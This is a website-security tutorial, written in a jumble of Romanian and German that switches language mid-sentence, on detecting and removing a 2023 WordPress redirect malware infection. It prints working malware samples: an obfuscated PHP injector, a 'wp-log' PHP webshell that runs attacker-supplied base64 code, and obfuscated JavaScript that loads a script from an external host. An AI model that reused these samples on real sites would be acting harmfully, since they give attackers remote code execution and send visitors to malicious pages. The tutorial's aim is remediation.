WordPress este cu siguranță cea mai utilizată platformă CMS (Content Management System) atât pentru bloguri cât și pentru magazine online starter (cu modulul WooCommerce), ceea ce o face să fie și cea mai vizată de atacuri informatice (hacking). Una dintre cele mai utilizate operațiuni de hacking are drept obiectiv redirectionarea website-ului compromis către alte pagini web. Redirect WordPress Hack 2023 este un malware relativ nou care are ca impact redirectionarea intregului site catre pagini web de spam sau care la rândul lor pot virusa calculatoarele utilizatorilor.

Wenn Ihre auf WordPress entwickelte Website auf eine andere Website umgeleitet wird, ist sie höchstwahrscheinlich Opfer des bereits bekannten Weiterleitungs-Hacks.

In diesem Tutorial finden Sie die notwendigen Informationen und nützlichen Tipps, mit denen Sie eine mit einer Weiterleitung infizierte Website von Viren befreien können WordPress Hack (Virus Redirect). Durch die Kommentare können Sie zusätzliche Informationen erhalten oder um Hilfe bitten.

Detectarea virusului care redirectioneaza site-urile WordPress

Ein plötzlicher und ungerechtfertigter Rückgang des Website-Verkehrs, ein Rückgang der Anzahl der Bestellungen (bei Online-Shops) oder der Werbeeinnahmen sind erste Anzeichen dafür, dass etwas nicht stimmt. Erkennung “Redirect WordPress Hack 2023” (Virenumleitung) ist ebenfalls möglich “visuell” wenn Sie die Website öffnen und zu einer anderen Webseite weitergeleitet werden.

Erfahrungsgemäß sind die meisten Web-Malware mit Internetbrowsern kompatibel: Chrome, Firefox, Edge, Opera. Dacă ești utilizator de calculatoare Mac, acești viruși nu prea sunt vizibili în browserul Safari. Sistemul de securitate din Safari blocheaza tacit aceste scripturi malițioase.

Ce trebuie să faci dacă ai un website virusat cu Redirect WordPress Hack

Sper ca prima măsură nu este să vă panicați sau să stergeți website-ul. Nici măcar fișierele virusate sau cele ale virusului nu trebuie șterse în primă fază. Acestea conțin informații valoroase care vă pot ajuta să înțelegeți unde este breșa de securitate și ce a afectat virusul. Modus operandi.

Închide website-ul pentru public.

Cum închizi un website virusat pentru vizitatori? Cel mai simplu este să te folosești de managerul DNS și să-i stergi IP-ul pentru “A” (numele de domeniu) sau să-i definești un IP inexistent. Astfel, vizitatorii website-ului vor fi protejați de acest redirect WordPress hack care-i poate duce pe pagini web virusate sau de SPAM.

Dacă folosești CloudFlare drept DNS manager, te autentifici în cont și ștergi înregistrările DNS “A” pentru numele de domeniu. Astfel domeniul afectat de virus va rămâne fără IP, nemaiputând să fie accesat din internet.

Copiezi IP-ul website-ului și faci “Route” pentru a-l putea accesa numai tu. De la calculatorul tău.

Wie ändert man die echte IP einer Website auf Windows-Computern?

Metoda este adesea folosită pentru a bloca accesul la anumie website-uri prin editarea fișierului “Gastgeber”.

1. Deschizi Notepad sau alt editor text (cu drepturi administrator) și editezi fișierul “hosts“. Acesta este localizat în :

C:\Windows\System32\drivers\etc\hosts

2. In der Datei “Gastgeber” hinzufügen “Route” zur tatsächlichen IP Ihrer Website. IP oben vom DNS-Manager gelöscht.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Speichern Sie die Datei und rufen Sie die Website im Browser auf.

Wenn die Website nicht geöffnet wird und Sie in der Datei nichts falsch gemacht haben “Gastgeber”, es handelt sich höchstwahrscheinlich um einen DNS-Cache.

Um den DNS-Cache auf einem Windows-Betriebssystem zu leeren, öffnen Sie die Eingabeaufforderung und führen Sie dort den folgenden Befehl aus:

ipconfig /flushdns

Wie ändert man die echte IP einer Website auf Mac-/MacBook-Computern?

Für Mac-Benutzer ist es etwas einfacher, die tatsächliche IP einer Website zu ändern.

1. Öffnen Sie das Dienstprogramm Terminal.

2. Führen Sie die Befehlszeile aus (zur Ausführung ist ein Systemkennwort erforderlich):

sudo nano /etc/hosts

3. Fügen Sie wie bei Windows-Computern die echte IP der Domäne hinzu.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Speichern Sie die Änderungen. Ctrl+X (y).

Nachdem du es getan hast “Route”, sind Sie die einzige Person, die mit Redirect WordPress Hack auf die infizierte Website zugreifen kann.

Vollständige Backup-Website – Dateien und Datenbank

Auch wenn es infiziert ist “WordPress-Hack umleiten”, empfiehlt es sich, ein generelles Backup der gesamten Website zu erstellen. Dateien und Datenbank. Möglicherweise können Sie auch eine lokale Kopie beider Dateien speichern public / public_html sowie die Datenbank.

Identifizierung der von Viren verwendeten Dateien und der durch Redirect WordPress Hack 2023 geänderten Dateien

Die Hauptzieldateien der WordPress Ich bin index.php (in der Wurzel), header.php, index.php Und footer.php des aktiven WordPress-Themes. Überprüfen Sie diese Dateien manuell und identifizieren Sie bösartigen Code oder ein Malware-Skript.

Im Jahr 2023 ein Virus vom Typ “WordPress-Hack umleiten” einstellen index.php ein Code der Form:

(Ich empfehle nicht, diese Codes auszuführen!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Entschlüsselt, das hier Skript-Malware Es ist im Grunde die Folge einer Infektion der WordPress-Website. Es ist nicht das Skript hinter der Malware, sondern das Skript, das es ermöglicht, die infizierte Webseite umzuleiten. Wenn wir das obige Skript entschlüsseln, erhalten wir:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Um alle Dateien auf dem Server zu identifizieren, die diesen Code enthalten, ist es gut, Zugriff zu haben SSH zum Server, um Dateiprüfungs- und Verwaltungsbefehlszeilen unter Linux auszuführen.

Verwandt: Wie können Sie mit Hilfe der Google -Suche einen Virus -Blog haben oder nicht. (WordPress -Virus)

Nachfolgend finden Sie zwei Befehle, die auf jeden Fall hilfreich sind, um kürzlich geänderte Dateien und Dateien zu identifizieren, die einen bestimmten Code (String) enthalten.

Cum vezi pe Linux fișierele PHP modificate în ultimile 24 de ore sau într-un alt interval de timp?

Befehl “find” este foarte simplă de utilizat și permite personalizare pentru a seta perioada de timp, path-ul în care se face căutarea și tipul fișierelor.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

În output o să primești informații despre data și ora la care a fost modificat fișierul, permisunile de scriere / citire / executie (chmod) și cărui grup / user aparține.

Dacă vrei să verifici cu mai multe zile în urmă, schimbă valoarea “-mtime -1” sau folosește “-mmin -360” pentru minute (6 ore).

Cum cauți un cod (string) în interiorul fișierelor PHP, Java?

Linia de comandă “finden” mit dem Sie schnell alle PHP- oder Java-Dateien finden können, die einen bestimmten Code enthalten, lautet wie folgt:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Der Befehl sucht nach den Dateien und zeigt sie an .php Und .js die enthalten “uJjBRODYsU“.

Mithilfe der beiden oben genannten Befehle können Sie ganz einfach herausfinden, welche Dateien kürzlich geändert wurden und welche Malware-Code enthalten.

Entfernt Schadcode aus geänderten Dateien, ohne den korrekten Code zu gefährden. In meinem Szenario wurde die Malware vor dem Öffnen platziert <head>.

Beim Ausführen des ersten Befehls “finden” Es ist durchaus möglich, dass Sie auf dem Server auch neue Dateien entdecken, die nicht von WordPress stammen und nicht von Ihnen dort abgelegt wurden. Dateien, die zum Redirect WordPress Hack-Virus gehören.

În scenariul investigat de mine, au apărut pe server fișiere de forma “wp-log-nOXdgD.php“. Acestea sunt fișiere “generatoare” care de asemenea conțin cod malware utilizat de virusul pentru redirecționare.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Scopul fișierelor de tip “wp-log-*” este acela de a răspândi virusul hack redirect și la alte website-uri găzduite pe server. Este un cod malware de tip “webshell” compus dintr-o secțiune de bază (în care sunt definite câteva variabile criptate) și o secțiune de execuție prin care atacatorul încearcă să încarce și să execute un cod malware în sistem.

Dacă există o variabilă POST numită ‘bh‘ și valoarea sa criptată MD5 este egală cu “8f1f964a4b4d8d1ac3f0386693d28d03“, atunci scriptul pare să scrie conținutul criptat base64 al unei alte variabile numită ‘b3‘ într-un fișier temporar și apoi încearcă să includă acest fișier temporar.

În cazul în care există o variabilă POST oder GET numită ‘tick‘, scriptul va răspunde cu valoarea MD5 a șirului “885“.

Ca să identifici toate fișierele de pe server care conțin acest cod, alege un string care este comun, apoi execută comanda de “find” (similară celei de mai sus). Șterge toate fișierele care conțin acest cod malware.

Sicherheitslücke durch Redirect-WordPress-Hack ausgenutzt

Cel mai probabil acest virus de redirect ajunge prin exploatarea user-ului de administrare WordPress sau prin identificarea unui plugin vulnerabil care permite adăugarea de utilizatori cu privilegii de administrator.

Pentru cele mai multe website-uri construite pe platforma WordPress este posibilă editarea fișierelor temelor sau pluginüber die Administrationsoberfläche (Dashboard). Somit kann eine böswillige Person Malware-Code zu den Theme-Dateien hinzufügen, um die oben gezeigten Skripte zu generieren.

Ein Beispiel für einen solchen Malware-Code ist dieser:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript unmittelbar nach dem Öffnen des Tags im WordPress-Theme-Header identifiziert <head>.

Es ist ziemlich schwierig, dieses JavaScript zu entschlüsseln, aber es ist offensichtlich, dass es eine andere Webadresse abfragt, von der es höchstwahrscheinlich andere Skripte zum Erstellen der Dateien abruft “wp-log-*” worüber wir oben gesprochen haben.

Suchen und löschen Sie diesen Code aus allen Dateien PHP betroffen.

Soweit ich das beurteilen konnte, war dieser Code manuell hinzugefügt durch einen neuen Benutzer mit Administratorrechten.

Um das Hinzufügen von Malware-Code aus dem Dashboard zu verhindern, ist es daher am besten, die Option zum Bearbeiten von WordPress-Themes/Plugins über das Dashboard zu deaktivieren.

Bearbeiten Sie die Datei wp-config.php und füge die Zeilen hinzu:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Nachdem Sie diese Änderung vorgenommen haben, kann kein WordPress-Benutzer mehr Dateien über das Dashboard bearbeiten.

Überprüfen Sie Benutzer mit Administratorrolle

Nachfolgend finden Sie eine SQL-Abfrage, mit der Sie nach Administratorbenutzern auf der WordPress-Plattform suchen können:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Diese Abfrage gibt alle Benutzer in der Tabelle zurück wp_users wer die Administratorrolle zugewiesen hat. Die Abfrage erfolgt auch für die Tabelle wp_usermeta um das Meta zu durchsuchen ‘wp_capabilities', das Informationen über Benutzerrollen enthält.

Eine andere Methode besteht darin, sie anhand von Folgendem zu identifizieren: Dashboard → Users → All Users → Administrator. Es gibt jedoch Vorgehensweisen, mit denen ein Benutzer im Dashboard-Bereich ausgeblendet werden kann. Also der beste Weg, Benutzer zu sehen “Administrator” von WordPress ist der obige SQL-Befehl.

In meinem Fall habe ich den Benutzer anhand seines Namens in der Datenbank identifiziert “wp-import-user“. Ziemlich suggestiv.

Außerdem können Sie hier Datum und Uhrzeit der Erstellung des WordPress-Benutzers sehen. Auch die Benutzer-ID ist sehr wichtig, da sie die Serverprotokolle durchsucht. Auf diese Weise können Sie alle Aktivitäten dieses Benutzers sehen.

Benutzer mit Administratorrolle löschen was du also nicht weißt Passwörter ändern an alle administrativen Benutzer. Herausgeber, Autor, Administrator.

Ändern Sie das Passwort des SQL-Datenbankbenutzers der betroffenen Website.

Nach Durchführung dieser Schritte kann die Website für alle Benutzer neu gestartet werden.

Bedenken Sie jedoch, dass das, was ich oben dargestellt habe, eines von vielleicht Tausenden von Szenarien ist, in denen eine Website im Jahr 2023 mit Redirect WordPress Hack infiziert wird.

Wenn Ihre Website infiziert wurde und Sie Hilfe benötigen oder Fragen haben, steht Ihnen der Kommentarbereich zur Verfügung.